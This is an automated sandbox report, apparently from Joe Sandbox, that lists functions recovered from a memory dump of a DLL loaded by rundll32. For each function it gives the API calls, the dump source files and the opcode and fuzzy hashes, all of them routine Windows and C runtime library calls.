                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                      • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                      • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                      • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      • Opcode ID: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction ID: 44ba6f7c8c4d87fab9365827d96dd2610bd0c5aaa7a7505ecb33efb7383b78fb
                                                                                                                      • Opcode Fuzzy Hash: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction Fuzzy Hash: 2BC14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                      • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                      • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                      • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                      • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                      • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                      • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                      • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                      • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                      • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      • Opcode ID: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction ID: 16a76d7c805c79391281f5fd2ee222f5103365245b1589172f68e38ef912b2cf
                                                                                                                      • Opcode Fuzzy Hash: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction Fuzzy Hash: B62127755002556FDB21DFB49C81BAEB7F8DF59241FA14066F984D7240DB709A40CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
